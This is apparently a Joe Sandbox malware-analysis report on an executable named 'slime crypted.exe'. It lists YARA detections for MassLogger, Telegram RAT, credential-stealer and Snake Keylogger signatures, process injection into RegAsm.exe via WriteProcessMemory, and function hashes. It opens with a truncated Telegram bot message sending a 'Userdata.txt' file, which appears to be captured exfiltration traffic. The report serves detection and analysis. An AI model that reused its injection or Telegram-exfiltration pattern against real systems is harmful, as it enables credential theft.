{"ok":true,"result":{"message_id":139,"from":{"id":7800094213,"is_bot":true,"first_name":"NOVA2025","username":"slimeegwu_bot"},"chat":{"id":7832108732,"first_name":"Slime","type":"private"},"date":1736776926,"document":{"file_name":"Userdata.txt","mime_t

Target ID:	0
Start time:	09:01:54
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\slime crypted.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\slime crypted.exe"
Imagebase:	0xa00000
File size:	207'360 bytes
MD5 hash:	B3FEC0C78C0DD85B50C6D60D17E74B0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:01:55
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xc70000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	14.6%
Total number of Nodes:	205
Total number of Limit Nodes:	13

Executed Functions

Function 0717DCC8 Relevance: 23.8, Strings: 18, Instructions: 1316COMMON

Download Yara Rule

Strings

$]q, xrefs: 0717E8EE
4c]q, xrefs: 0717DFE7
$eq, xrefs: 0717DF32
heq, xrefs: 0717DFB4
c]q, xrefs: 0717E632
heq, xrefs: 0717DFAA
4c]q, xrefs: 0717DFDD
c]q, xrefs: 0717E616
$]q, xrefs: 0717E90C
,aq, xrefs: 0717ED55
|b^q, xrefs: 0717E0AE
,aq, xrefs: 0717ED41
c]q, xrefs: 0717E628
|b^q, xrefs: 0717E0F3
heq, xrefs: 0717DF6F
|b^q, xrefs: 0717E0E9
$]q, xrefs: 0717E900
c]q, xrefs: 0717E195

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: $eq$,aq$,aq$4c]q$4c]q$heq$heq$heq$|b^q$|b^q$|b^q$$]q$$]q$$]q$c]q$c]q$c]q$c]q
API String ID: 0-4174405184
Opcode ID: b6f779a4506f393ad8a52bfca52bd0195b5919edb6c225f4ff20decee147287e
Instruction ID: b5c10bbba66f6b1bf6be0d771d38c7213d1423d9dbb2e1cda647b14275a49999
Opcode Fuzzy Hash: b6f779a4506f393ad8a52bfca52bd0195b5919edb6c225f4ff20decee147287e
Instruction Fuzzy Hash: 5FC269B4B002158FCB19DF29C994A69BBF2FF88700F1585A9E44ADB3A5DB30EC45CB51

Function 07279330 Relevance: 1.9, Strings: 1, Instructions: 650
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 07279B94

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: d35216a5adf8e2a9889e399b07036292cd6ff6d12f94e29257b8201b5b1470f4
Instruction ID: 41a5fd80517e7da9407a13d48628da3ec72f08d57328d4803f253a8d1e1a73c8
Opcode Fuzzy Hash: d35216a5adf8e2a9889e399b07036292cd6ff6d12f94e29257b8201b5b1470f4
Instruction Fuzzy Hash: 7262D474D012298FDB64DF69C994BDDBBB2BB89300F1081EAD449AB291DB359E85CF40

Function 07174BB8 Relevance: 1.8, Strings: 1, Instructions: 526
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 07174E4C

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 4b516df6f928008bf69dcecf7f8eee84648c176d492c57c6f7721ab1699f8c86
Instruction ID: 4da65638cd0cc708a8b9fafc1dafa7cf8667ddacf62170acd81925eb6eea1891
Opcode Fuzzy Hash: 4b516df6f928008bf69dcecf7f8eee84648c176d492c57c6f7721ab1699f8c86
Instruction Fuzzy Hash: 8B125F74B002058FCB15DF68C9949AEBBF6FF88710B158569E906EB3A5DB31DC42CB90

Function 07279322 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a8e4f7a5916cbe6efd564a76b37ac0b18cf91edc73d0d5dfb8624caf4d3b3a
Instruction ID: be3293d8552fc08b113b7764ee7e7e78a9e52e6aac77f9ed7586ec2390c24652
Opcode Fuzzy Hash: 97a8e4f7a5916cbe6efd564a76b37ac0b18cf91edc73d0d5dfb8624caf4d3b3a
Instruction Fuzzy Hash: 9742D574D012298FDB64DF69C994BDDBBB2BF89300F1081EAD449AB294DB359E85CF40

Function 07200AC0 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050234132.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b1086be97e17274cbbb36f9c3f500b3f58b2bfa7fe52562ac371fb0165cc11c
Instruction ID: d9f25fcf72a564a439e99e251d2153f523ba291ebce69b13199324f4ddedcd6c
Opcode Fuzzy Hash: 0b1086be97e17274cbbb36f9c3f500b3f58b2bfa7fe52562ac371fb0165cc11c
Instruction Fuzzy Hash: 15F143B0A1020ACFEB24DFA9C984B9DBBF1FF44304F158559E405AF2A6DB74E945CB90

Function 0727B4C9 Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59b89d6657cea2244cf1f9f6e3e05cb56dd205c8c062d85e6c0538bf27e1bcaf
Instruction ID: 8beb113c85d8acc8b47b0383c200812527d0d7599178b74478efab58b712b98b
Opcode Fuzzy Hash: 59b89d6657cea2244cf1f9f6e3e05cb56dd205c8c062d85e6c0538bf27e1bcaf
Instruction Fuzzy Hash: 4AD19BB1B116068FDB19EB79C560BAF77FAAF89700F24846DD1868B390DB35E801CB51

Function 07277F18 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ff81f86e4496a7cc696592d6d223a1db7c9a673d7b9287a303ac25ef8044957
Instruction ID: fcce0eb6dd163fca42c9207b4515435a819c706326e1132578bc92524e78d011
Opcode Fuzzy Hash: 8ff81f86e4496a7cc696592d6d223a1db7c9a673d7b9287a303ac25ef8044957
Instruction Fuzzy Hash: BF61B5B4D11219DFDB08DFAAD5846AEBBF2FF89300F24856AD405AB364D7349941CF50

Function 07170CB0 Relevance: 38.1, Strings: 28, Instructions: 3075
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 07173D11
;]q, xrefs: 07171522
, ]q, xrefs: 0717336C
bq, xrefs: 0717133D
|bq, xrefs: 071728F4
p`]q, xrefs: 071719BD
,aq, xrefs: 07172A80
pBbq, xrefs: 07173DD3
p<]q, xrefs: 071712DC
4c]q, xrefs: 071715E4
$]q, xrefs: 0717127B
p ]q, xrefs: 07172AE5
,aq, xrefs: 07173CB0
c]q, xrefs: 07170F00
\s]q, xrefs: 071723D8
(Abq, xrefs: 07172F87
X#]q, xrefs: 07172C13
Hb^q, xrefs: 07171B45
$#]q, xrefs: 07172DF8
LR]q, xrefs: 07173241
Pp]q, xrefs: 07172955
\;]q, xrefs: 07173D72
0"]q, xrefs: 07172E64
PH]q, xrefs: 0717269E
|b^q, xrefs: 07171FEB
xaq, xrefs: 071725C9
4']q, xrefs: 0717121A
x bq, xrefs: 071740DF

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: $#]q$(Abq$(o]q$, ]q$,aq$,aq$0"]q$4']q$4c]q$Hb^q$LR]q$PH]q$Pp]q$X#]q$\;]q$\s]q$p ]q$p<]q$pBbq$p`]q$x bq$xaq$|b^q$|bq$bq$$]q$;]q$c]q
API String ID: 0-2453648194
Opcode ID: b6680e990c2c2f1c624b52fcac45280badc64d158108618c0006027f88c4e385
Instruction ID: 056217359dbd35b7723c9be9fa0fee5e59dbb585c9b5526f81909d9da2cec303
Opcode Fuzzy Hash: b6680e990c2c2f1c624b52fcac45280badc64d158108618c0006027f88c4e385
Instruction Fuzzy Hash: 5A537E70A80218AFEB269B94CD50BDD7B7AFF89300F1045D8E6496B2E4CE765E80DF15

Function 07170CA1 Relevance: 38.0, Strings: 28, Instructions: 3035
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 07173D11
;]q, xrefs: 07171522
, ]q, xrefs: 0717336C
bq, xrefs: 0717133D
|bq, xrefs: 071728F4
p`]q, xrefs: 071719BD
,aq, xrefs: 07172A80
pBbq, xrefs: 07173DD3
p<]q, xrefs: 071712DC
4c]q, xrefs: 071715E4
$]q, xrefs: 0717127B
p ]q, xrefs: 07172AE5
,aq, xrefs: 07173CB0
c]q, xrefs: 07170F00
\s]q, xrefs: 071723D8
(Abq, xrefs: 07172F87
X#]q, xrefs: 07172C13
Hb^q, xrefs: 07171B45
$#]q, xrefs: 07172DF8
LR]q, xrefs: 07173241
Pp]q, xrefs: 07172955
\;]q, xrefs: 07173D72
0"]q, xrefs: 07172E64
PH]q, xrefs: 0717269E
|b^q, xrefs: 07171FEB
xaq, xrefs: 071725C9
4']q, xrefs: 0717121A
x bq, xrefs: 071740DF

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: $#]q$(Abq$(o]q$, ]q$,aq$,aq$0"]q$4']q$4c]q$Hb^q$LR]q$PH]q$Pp]q$X#]q$\;]q$\s]q$p ]q$p<]q$pBbq$p`]q$x bq$xaq$|b^q$|bq$bq$$]q$;]q$c]q
API String ID: 0-2453648194
Opcode ID: 07539fc31d48ca5f2348bfbc5e392ac858b4f745dcf45c3a0acf2f20e4e47309
Instruction ID: 3d2f85b644d49e935d4acaf75e68af6d129f5f5a68e7b15bb581a8d4625b58cf
Opcode Fuzzy Hash: 07539fc31d48ca5f2348bfbc5e392ac858b4f745dcf45c3a0acf2f20e4e47309
Instruction Fuzzy Hash: 7D537E70A80218AFEB269B94CD50BDD7B7AFF89300F1045D8E6496B2E4CE765E80DF15

Function 0109D570 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0109D5FE
GetCurrentThread.KERNEL32 ref: 0109D63B
GetCurrentProcess.KERNEL32 ref: 0109D678
GetCurrentThreadId.KERNEL32 ref: 0109D6D1

Memory Dump Source

Source File: 00000000.00000002.2047500903.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_slime crypted.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 712084a774e50ae1638c246542bb256f3b08dbd4a8d70864495cd3ba4b4b2fe8
Instruction ID: 4549a87747a338dd1685f670c98e114b951f0b84c6a0117a5997b89328183c78
Opcode Fuzzy Hash: 712084a774e50ae1638c246542bb256f3b08dbd4a8d70864495cd3ba4b4b2fe8
Instruction Fuzzy Hash: C95165B09003498FDB54DFA9D558BEEBFF1EF88304F208499E449A7360D7785884CBA5

Function 0109D580 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0109D5FE
GetCurrentThread.KERNEL32 ref: 0109D63B
GetCurrentProcess.KERNEL32 ref: 0109D678
GetCurrentThreadId.KERNEL32 ref: 0109D6D1

Memory Dump Source

Source File: 00000000.00000002.2047500903.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_slime crypted.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3f5b2138e0f7b7dd315c987783b5dadaa5b8697f92105680d432f1943c4cb171
Instruction ID: 5f82cd81b2f0cdab2ba8ea24ba5be95630ae9a36864cffc9e3f9720a705371b8
Opcode Fuzzy Hash: 3f5b2138e0f7b7dd315c987783b5dadaa5b8697f92105680d432f1943c4cb171
Instruction Fuzzy Hash: FF5155B09003498FDB54DFAAD548BEEBBF5FF88304F208459E449A7360D7789984CBA5

Function 0716E0C0 Relevance: 3.9, Strings: 3, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 0716E13F
(aq, xrefs: 0716E16B
(aq, xrefs: 0716E113

Memory Dump Source

Source File: 00000000.00000002.2050130587.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7160000_slime crypted.jbxd

Similarity

API ID:
String ID: (aq$(aq$(aq
API String ID: 0-2593664646
Opcode ID: cf8dc0f45b5c4f4d49b10ee3caf5cfd6d5dbe46185a887384da342f703847926
Instruction ID: 1a5583acdba3c4992e1715403eee7ccaaea69122df9dcde083719a5b8842df45
Opcode Fuzzy Hash: cf8dc0f45b5c4f4d49b10ee3caf5cfd6d5dbe46185a887384da342f703847926
Instruction Fuzzy Hash: 173112B67042055FC759DE6DD8549AFBBEAFFC4261B148229E809DB388DF31DC068390

Function 0717C458 Relevance: 2.7, Strings: 2, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,aq, xrefs: 0717C6E3
sJ, xrefs: 0717C5A9

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: ,aq$sJ
API String ID: 0-1855860137
Opcode ID: f356086c05809c2e05a8abdcb310f80466324b362e383fa55b482aa1e4febd7f
Instruction ID: 787ab5df016e7ff7a9dd040ff37f76622b6344fd30695c5fd05dfe807827f557
Opcode Fuzzy Hash: f356086c05809c2e05a8abdcb310f80466324b362e383fa55b482aa1e4febd7f
Instruction Fuzzy Hash: 43A16174B102058FCB19DF69C95496EBBB6BF89700F108559E4469F3A8DF30ED06CB90

Function 07201564 Relevance: 1.9, APIs: 1, Instructions: 438
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 072018DA

Memory Dump Source

Source File: 00000000.00000002.2050234132.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_slime crypted.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 195ac94961103d9549714409d0dfebdbaf621d10bb26ab9c968eaecfede757c1
Instruction ID: 7f94b7cbe14079e41dd94fbf6424194df43f44bf9ca1ea21213a7d8f9df14111
Opcode Fuzzy Hash: 195ac94961103d9549714409d0dfebdbaf621d10bb26ab9c968eaecfede757c1
Instruction Fuzzy Hash: D23154B590025A8FCB00DF99D480ADEBBF4FB58314F148A6AD418AB352D379A944CFA5

Function 07278F9C Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072791DE

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1f618252ad405c07f892246a609ffaa062fb963f9d8b0eadc7ba179dbcacc9e5
Instruction ID: b2ad10300a534540c3fcd2224decb98faf771e484da2b3c7aa339f9529835b0b
Opcode Fuzzy Hash: 1f618252ad405c07f892246a609ffaa062fb963f9d8b0eadc7ba179dbcacc9e5
Instruction Fuzzy Hash: A39169B1D1031ADFDB14DFA8C9417DDBBB2BF44310F048169E849A7240DB75A985CF92

Function 07278FA8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072791DE

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2a90e0347f2ddbcb6019a428b9554d934f2efda289c9fbf88a24b44b7ae9bfab
Instruction ID: 568997a39d148c1106e9d7a836166796835cdbd098e753a6f063baa5251cf073
Opcode Fuzzy Hash: 2a90e0347f2ddbcb6019a428b9554d934f2efda289c9fbf88a24b44b7ae9bfab
Instruction Fuzzy Hash: 5F9158B1D1031ADFDB14DFA8C9417DDBBB2BF45310F048169D849A7240DB75A985CF92

Function 0109B2DA Relevance: 1.7, APIs: 1, Instructions: 201COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0109B53E

Memory Dump Source

Source File: 00000000.00000002.2047500903.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_slime crypted.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8b5fa5ee63191a7b798bcaa0c4f64767ecac34a6096b14fe8f2f6c4a36ef03bb
Instruction ID: 0af1c4efd7340c27738cf6e35e1c4319b06be84e1dfa0e6b60c98818c5e9387b
Opcode Fuzzy Hash: 8b5fa5ee63191a7b798bcaa0c4f64767ecac34a6096b14fe8f2f6c4a36ef03bb
Instruction Fuzzy Hash: 60814670A00B458FDB64DF69E064BAABBF1FF88310F10896DD48AD7A50DB75E845CB90

Function 0727D850 Relevance: 1.7, APIs: 1, Instructions: 157threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0727D910

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: bab5194c7ed5f1d11f8b8dbf1918277687bc47a67a0feac837bce020e9ec8c8f
Instruction ID: b17d947d5dfc24b60c91003cdd5de69b37f2212dafab03e80e47e9676d259618
Opcode Fuzzy Hash: bab5194c7ed5f1d11f8b8dbf1918277687bc47a67a0feac837bce020e9ec8c8f
Instruction Fuzzy Hash: 126178B0E2021ADFDB14DFA9D694BAEBBB1FF48310F108469E405AB391CB749881CF50

Function 07179C30 Relevance: 1.6, Strings: 1, Instructions: 376COMMON

Download Yara Rule

Strings

Haq, xrefs: 07179D69

Memory Dump Source

Source File: 00000000.00000002.2050153613.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_slime crypted.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: d427cd6405424a78cd3b8a38ec24701249bb00141f538126cb30974e1388d0d0
Instruction ID: 5f1dbeac0b8f8cd58816d6f8631b225670f13b3090198fb35f26f74d20d14867
Opcode Fuzzy Hash: d427cd6405424a78cd3b8a38ec24701249bb00141f538126cb30974e1388d0d0
Instruction Fuzzy Hash: 5AD101B1B14226CFCB668F68894067ABFF6AF89710F15446AE816DB394CB30EC45C7D0

Function 053D1DCA Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053D1EE2

Memory Dump Source

Source File: 00000000.00000002.2049393981.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_slime crypted.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 63bb0ab47fa2bc5a388ab5ea1c08cb3a8929e3d0453d3dedee99f7f2ac220254
Instruction ID: 9132df9736814184efb104f1329e8cbb6a2f1dc569e8211f45d3207780e6639f
Opcode Fuzzy Hash: 63bb0ab47fa2bc5a388ab5ea1c08cb3a8929e3d0453d3dedee99f7f2ac220254
Instruction Fuzzy Hash: 4351B1B5D003499FDF14CFA9D884ADEFBB5BF48310F24822AE819AB250D7759985CF90

Function 053D1DD0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053D1EE2

Memory Dump Source

Source File: 00000000.00000002.2049393981.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_slime crypted.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e2d9b1783389fab503caa9e6430956d43013c5a9d1b6f7bf2a8f9a189ec6e4ec
Instruction ID: b9bf9ada4a27b850a440bd67b4a555fc328adc26b45e397d6b889bd1ba2b1303
Opcode Fuzzy Hash: e2d9b1783389fab503caa9e6430956d43013c5a9d1b6f7bf2a8f9a189ec6e4ec
Instruction Fuzzy Hash: 9E41A0B5D003499FDF14CF9AD884ADEFBB5BF48310F24822AE819AB210D7759985CF90

Function 0109590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 010959C9

Memory Dump Source

Source File: 00000000.00000002.2047500903.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_slime crypted.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6fdeddea0856f98915ddcde39601f7fbb82dc305a14d12c4cc20fd8745d6dc0c
Instruction ID: 8d6bc6f1ce826f0dccdd50d2f6f74980f7a5f1a850b499180f187c8cfa044e8f
Opcode Fuzzy Hash: 6fdeddea0856f98915ddcde39601f7fbb82dc305a14d12c4cc20fd8745d6dc0c
Instruction Fuzzy Hash: 964101B0C00719CBDF25CFAAC884ADDBBF2BF49304F20806AD448AB251DB75594ACF90

Function 053D1334 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 053D4461

Memory Dump Source

Source File: 00000000.00000002.2049393981.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_slime crypted.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: a828ef3414a5c06f803f7928728da7be4fb89edd3cec455fa0206bbb611c12e6
Instruction ID: 6d6c87f8d35a9cceb4819269e98ffe9daac73a821de9106dcf9414a173df660f
Opcode Fuzzy Hash: a828ef3414a5c06f803f7928728da7be4fb89edd3cec455fa0206bbb611c12e6
Instruction Fuzzy Hash: 154108B9A003058FCB14CF99D488AAAFBF5FF88314F24C459D519A7321D3B5A885CFA0

Function 0109449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 010959C9

Memory Dump Source

Source File: 00000000.00000002.2047500903.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_slime crypted.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: cbbb8753f61549ae692a7c476fa500844dd3d6ec92416318f1b8f94745ba5db6
Instruction ID: 8ecc0801967cec5982dfa1a4e17149f758744a4ba74d2062c8b61181ad95b55d
Opcode Fuzzy Hash: cbbb8753f61549ae692a7c476fa500844dd3d6ec92416318f1b8f94745ba5db6
Instruction Fuzzy Hash: 3141F2B0C00719CBDF25CFAAC894B9EBBF5BF49304F20806AD449AB255DB756949CF90

Function 07278D19 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07278DB0

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 82e38a6cb055e55fab07f091813cad0e484a75e8a26d8b3813b0d8f4139313c0
Instruction ID: 32940d1a177587ba6bec8d0591fb8b772b31ec9764a0fded924bdc531cd8f2e2
Opcode Fuzzy Hash: 82e38a6cb055e55fab07f091813cad0e484a75e8a26d8b3813b0d8f4139313c0
Instruction Fuzzy Hash: 972126B59003599FCF10DFA9D985BEEBBF5FF48310F10842AE919A7240D7789944CBA0

Function 07278D20 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07278DB0

Memory Dump Source

Source File: 00000000.00000002.2050262638.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7270000_slime crypted.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
